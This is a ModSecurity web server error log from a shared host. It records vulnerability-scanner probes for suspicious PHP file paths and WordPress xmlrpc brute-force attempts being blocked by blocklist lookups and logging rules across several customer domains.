[Tue May 26 13:55:50.844045 2026] [security2:error] [pid 560287:tid 560436] [client 40.83.92.30:5776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/a7.php"] [unique_id "ahVZDpmX5s6sDS3wJVcpIwAAAJc"]
[Tue May 26 13:55:50.850072 2026] [security2:error] [pid 555743:tid 555884] [client 49.13.24.81:29564] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVZDsjqAquC0YaxQjDFvwAAARU"], referer: http://ucdc.co.in/
[Tue May 26 13:55:51.293291 2026] [security2:error] [pid 560287:tid 560506] [client 40.83.92.30:6129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZD5mX5s6sDS3wJVcpKQAAANg"]
[Tue May 26 13:55:51.512297 2026] [security2:error] [pid 560287:tid 560422] [client 40.83.92.30:6129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahVZD5mX5s6sDS3wJVcpKwAAAIk"]
[Tue May 26 13:55:51.512434 2026] [security2:error] [pid 560287:tid 560422] [client 40.83.92.30:6129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahVZD5mX5s6sDS3wJVcpKwAAAIk"]
[Tue May 26 13:55:51.714459 2026] [security2:error] [pid 560287:tid 560485] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZD5mX5s6sDS3wJVcpKAAAAMQ"]
[Tue May 26 13:55:51.964809 2026] [security2:error] [pid 560287:tid 560454] [client 40.83.92.30:5760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/themes/index.php"] [unique_id "ahVZD5mX5s6sDS3wJVcpMQAAAKc"]
[Tue May 26 13:55:51.964922 2026] [security2:error] [pid 560287:tid 560454] [client 40.83.92.30:5760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/themes/index.php"] [unique_id "ahVZD5mX5s6sDS3wJVcpMQAAAKc"]
[Tue May 26 13:55:52.129474 2026] [security2:error] [pid 555743:tid 555960] [client 106.192.248.115:58393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZEMjqAquC0YaxQjDFyAAAAWE"]
[Tue May 26 13:55:52.132043 2026] [security2:error] [pid 555743:tid 555960] [client 106.192.248.115:58393] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZEMjqAquC0YaxQjDFyAAAAWE"]
[Tue May 26 13:55:52.599013 2026] [security2:error] [pid 555743:tid 555972] [client 40.83.92.30:6128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/NewFile.php"] [unique_id "ahVZEMjqAquC0YaxQjDFzQAAAW0"]
[Tue May 26 13:55:52.599174 2026] [security2:error] [pid 555743:tid 555972] [client 40.83.92.30:6128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/NewFile.php"] [unique_id "ahVZEMjqAquC0YaxQjDFzQAAAW0"]
[Tue May 26 13:55:53.060367 2026] [security2:error] [pid 555743:tid 555976] [client 40.83.92.30:5812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-Blogs.php"] [unique_id "ahVZEcjqAquC0YaxQjDFzwAAAXE"]
[Tue May 26 13:55:53.060473 2026] [security2:error] [pid 555743:tid 555976] [client 40.83.92.30:5812] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-Blogs.php"] [unique_id "ahVZEcjqAquC0YaxQjDFzwAAAXE"]
[Tue May 26 13:55:53.540484 2026] [security2:error] [pid 560287:tid 560552] [client 40.83.92.30:6101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVZEZmX5s6sDS3wJVcpOQAAAQQ"]
[Tue May 26 13:55:53.540645 2026] [security2:error] [pid 560287:tid 560552] [client 40.83.92.30:6101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVZEZmX5s6sDS3wJVcpOQAAAQQ"]
[Tue May 26 13:55:54.002567 2026] [security2:error] [pid 560287:tid 560507] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZEZmX5s6sDS3wJVcpOwAAANk"]
[Tue May 26 13:55:54.100532 2026] [security2:error] [pid 560287:tid 560499] [client 40.83.92.30:6117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/themes.php"] [unique_id "ahVZEpmX5s6sDS3wJVcpQAAAANI"]
[Tue May 26 13:55:54.100731 2026] [security2:error] [pid 560287:tid 560499] [client 40.83.92.30:6117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/themes.php"] [unique_id "ahVZEpmX5s6sDS3wJVcpQAAAANI"]
[Tue May 26 13:55:54.595067 2026] [security2:error] [pid 560287:tid 560548] [client 40.83.92.30:5723] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZEpmX5s6sDS3wJVcpQgAAAQA"]
[Tue May 26 13:55:54.816006 2026] [security2:error] [pid 560287:tid 560484] [client 40.83.92.30:5723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVZEpmX5s6sDS3wJVcpRAAAAMM"]
[Tue May 26 13:55:54.816174 2026] [security2:error] [pid 560287:tid 560484] [client 40.83.92.30:5723] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVZEpmX5s6sDS3wJVcpRAAAAMM"]
[Tue May 26 13:55:55.273899 2026] [security2:error] [pid 560287:tid 560428] [client 202.141.30.10:35440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZE5mX5s6sDS3wJVcpRQAAAI8"]
[Tue May 26 13:55:55.274014 2026] [security2:error] [pid 560287:tid 560428] [client 202.141.30.10:35440] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZE5mX5s6sDS3wJVcpRQAAAI8"]
[Tue May 26 13:55:55.445351 2026] [security2:error] [pid 555743:tid 555929] [client 40.83.92.30:6111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ws83.php"] [unique_id "ahVZE8jqAquC0YaxQjDF4AAAAUI"]
[Tue May 26 13:55:55.445467 2026] [security2:error] [pid 555743:tid 555929] [client 40.83.92.30:6111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ws83.php"] [unique_id "ahVZE8jqAquC0YaxQjDF4AAAAUI"]
[Tue May 26 13:55:55.940556 2026] [security2:error] [pid 555743:tid 555952] [client 40.83.92.30:5793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/atex1.php"] [unique_id "ahVZE8jqAquC0YaxQjDF6gAAAVk"]
[Tue May 26 13:55:55.940696 2026] [security2:error] [pid 555743:tid 555952] [client 40.83.92.30:5793] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/atex1.php"] [unique_id "ahVZE8jqAquC0YaxQjDF6gAAAVk"]
[Tue May 26 13:55:56.108993 2026] [security2:error] [pid 560287:tid 560476] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZE5mX5s6sDS3wJVcpRgAAALw"]
[Tue May 26 13:55:56.462287 2026] [security2:error] [pid 555743:tid 555992] [client 40.83.92.30:5711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/class-t.api.php"] [unique_id "ahVZFMjqAquC0YaxQjDF8AAAAYE"]
[Tue May 26 13:55:56.462440 2026] [security2:error] [pid 555743:tid 555992] [client 40.83.92.30:5711] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/class-t.api.php"] [unique_id "ahVZFMjqAquC0YaxQjDF8AAAAYE"]
[Tue May 26 13:55:56.930327 2026] [security2:error] [pid 555743:tid 555881] [client 40.83.92.30:5810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/w.php"] [unique_id "ahVZFMjqAquC0YaxQjDF9AAAARI"]
[Tue May 26 13:55:56.930471 2026] [security2:error] [pid 555743:tid 555881] [client 40.83.92.30:5810] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/w.php"] [unique_id "ahVZFMjqAquC0YaxQjDF9AAAARI"]
[Tue May 26 13:55:56.962742 2026] [security2:error] [pid 560287:tid 560475] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZFJmX5s6sDS3wJVcpSQAAALs"]
[Tue May 26 13:55:57.448588 2026] [security2:error] [pid 560287:tid 560546] [client 40.83.92.30:5708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/bless.php"] [unique_id "ahVZFZmX5s6sDS3wJVcpSwAAAP4"]
[Tue May 26 13:55:57.448729 2026] [security2:error] [pid 560287:tid 560546] [client 40.83.92.30:5708] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/bless.php"] [unique_id "ahVZFZmX5s6sDS3wJVcpSwAAAP4"]
[Tue May 26 13:55:57.939674 2026] [security2:error] [pid 560287:tid 560516] [client 40.83.92.30:6107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/sagax1.php"] [unique_id "ahVZFZmX5s6sDS3wJVcpUwAAAOI"]
[Tue May 26 13:55:57.939783 2026] [security2:error] [pid 560287:tid 560516] [client 40.83.92.30:6107] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/sagax1.php"] [unique_id "ahVZFZmX5s6sDS3wJVcpUwAAAOI"]
[Tue May 26 13:55:58.565205 2026] [security2:error] [pid 560287:tid 560450] [client 40.83.92.30:5721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wpc.php"] [unique_id "ahVZFpmX5s6sDS3wJVcpWQAAAKQ"]
[Tue May 26 13:55:58.565329 2026] [security2:error] [pid 560287:tid 560450] [client 40.83.92.30:5721] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wpc.php"] [unique_id "ahVZFpmX5s6sDS3wJVcpWQAAAKQ"]
[Tue May 26 13:55:58.631985 2026] [security2:error] [pid 560287:tid 560439] [client 129.222.147.134:3152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZFpmX5s6sDS3wJVcpVgAAAJo"]
[Tue May 26 13:55:58.632191 2026] [security2:error] [pid 560287:tid 560439] [client 129.222.147.134:3152] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZFpmX5s6sDS3wJVcpVgAAAJo"]
[Tue May 26 13:55:59.243759 2026] [security2:error] [pid 560287:tid 560442] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZFpmX5s6sDS3wJVcpWgAAAJw"]
[Tue May 26 13:55:59.248260 2026] [security2:error] [pid 555743:tid 555959] [client 40.83.92.30:6133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/fone1.php"] [unique_id "ahVZF8jqAquC0YaxQjDGCQAAAWA"]
[Tue May 26 13:55:59.248361 2026] [security2:error] [pid 555743:tid 555959] [client 40.83.92.30:6133] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/fone1.php"] [unique_id "ahVZF8jqAquC0YaxQjDGCQAAAWA"]
[Tue May 26 13:56:00.042965 2026] [security2:error] [pid 555743:tid 555954] [client 40.83.92.30:6110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ncx.php"] [unique_id "ahVZGMjqAquC0YaxQjDGEgAAAVs"]
[Tue May 26 13:56:00.043098 2026] [security2:error] [pid 555743:tid 555954] [client 40.83.92.30:6110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ncx.php"] [unique_id "ahVZGMjqAquC0YaxQjDGEgAAAVs"]
[Tue May 26 13:56:00.743159 2026] [security2:error] [pid 555743:tid 555940] [client 40.83.92.30:5808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVZGMjqAquC0YaxQjDGHAAAAU0"]
[Tue May 26 13:56:00.743324 2026] [security2:error] [pid 555743:tid 555940] [client 40.83.92.30:5808] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVZGMjqAquC0YaxQjDGHAAAAU0"]
[Tue May 26 13:56:00.808728 2026] [security2:error] [pid 555743:tid 555917] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZGMjqAquC0YaxQjDGGAAAATY"]
[Tue May 26 13:56:01.527527 2026] [security2:error] [pid 555743:tid 555906] [client 40.83.92.30:5700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wso.php"] [unique_id "ahVZGcjqAquC0YaxQjDGJgAAASs"]
[Tue May 26 13:56:01.527703 2026] [security2:error] [pid 555743:tid 555906] [client 40.83.92.30:5700] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wso.php"] [unique_id "ahVZGcjqAquC0YaxQjDGJgAAASs"]
[Tue May 26 13:56:02.247669 2026] [security2:error] [pid 555743:tid 555942] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZGcjqAquC0YaxQjDGLgAAAU8"]
[Tue May 26 13:56:02.337545 2026] [security2:error] [pid 555743:tid 555948] [client 40.83.92.30:5815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/zup.php73"] [unique_id "ahVZGsjqAquC0YaxQjDGNwAAAVU"]
[Tue May 26 13:56:02.337713 2026] [security2:error] [pid 555743:tid 555948] [client 40.83.92.30:5815] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/zup.php73"] [unique_id "ahVZGsjqAquC0YaxQjDGNwAAAVU"]
[Tue May 26 13:56:02.892758 2026] [security2:error] [pid 560287:tid 560526] [client 40.83.92.30:5775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/k.php"] [unique_id "ahVZGpmX5s6sDS3wJVcpZgAAAOw"]
[Tue May 26 13:56:02.892892 2026] [security2:error] [pid 560287:tid 560526] [client 40.83.92.30:5775] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/k.php"] [unique_id "ahVZGpmX5s6sDS3wJVcpZgAAAOw"]
[Tue May 26 13:56:03.509439 2026] [security2:error] [pid 560287:tid 560522] [client 40.83.92.30:5701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-blink.php"] [unique_id "ahVZG5mX5s6sDS3wJVcpaAAAAOg"]
[Tue May 26 13:56:03.509554 2026] [security2:error] [pid 560287:tid 560522] [client 40.83.92.30:5701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-blink.php"] [unique_id "ahVZG5mX5s6sDS3wJVcpaAAAAOg"]
[Tue May 26 13:56:04.046707 2026] [security2:error] [pid 560287:tid 560513] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZG5mX5s6sDS3wJVcpawAAAN8"]
[Tue May 26 13:56:04.092688 2026] [security2:error] [pid 560287:tid 560423] [client 40.83.92.30:6108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZHJmX5s6sDS3wJVcpbgAAAIo"]
[Tue May 26 13:56:04.322718 2026] [security2:error] [pid 560287:tid 560458] [client 40.83.92.30:6108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZHJmX5s6sDS3wJVcpcQAAAKs"]
[Tue May 26 13:56:04.563401 2026] [security2:error] [pid 560287:tid 560426] [client 40.83.92.30:6108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZHJmX5s6sDS3wJVcpcgAAAI0"]
